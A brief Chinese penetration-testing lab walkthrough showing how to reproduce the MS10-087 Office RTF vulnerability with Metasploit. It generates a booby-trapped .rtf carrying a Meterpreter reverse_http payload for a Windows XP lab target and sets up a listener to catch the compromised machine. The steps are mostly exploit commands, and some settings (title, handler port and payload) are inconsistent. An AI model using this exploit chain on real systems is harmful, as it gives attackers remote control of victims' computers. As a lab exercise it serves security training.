渗透测试中期--漏洞复现客户端渗透攻击--office渗透攻击(ms10_08)

靶机：WIN XP 10.10.10.130

攻击机：BT5 10.10.10.128

一、进入msf终端并查找、调用ms10_087漏洞渗透代码

msfconsole
search ms10_087
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

　　

 

 二、设置参数生成.rtf文档并将文档copy到WIN XP靶机上

　　

set payload windows/meterpreter/reverse_http #调用meterpreter的攻击载荷。反向连接到攻击机
set LHOST 10.10.10.128
set FILENAME ms10087.rtf
exploit

　　　　　

      

　　

三、设置侦听模块监听肉鸡上线

use exploit/multi/handler #使用侦听模块set LHOST 10.10.10.128 #设置本机ip
set LPORT 5000 #设置本机监听的端口
exploit #进行渗透

之后再WIN XP上打开刚才的.rtf文件，等待肉鸡上线.....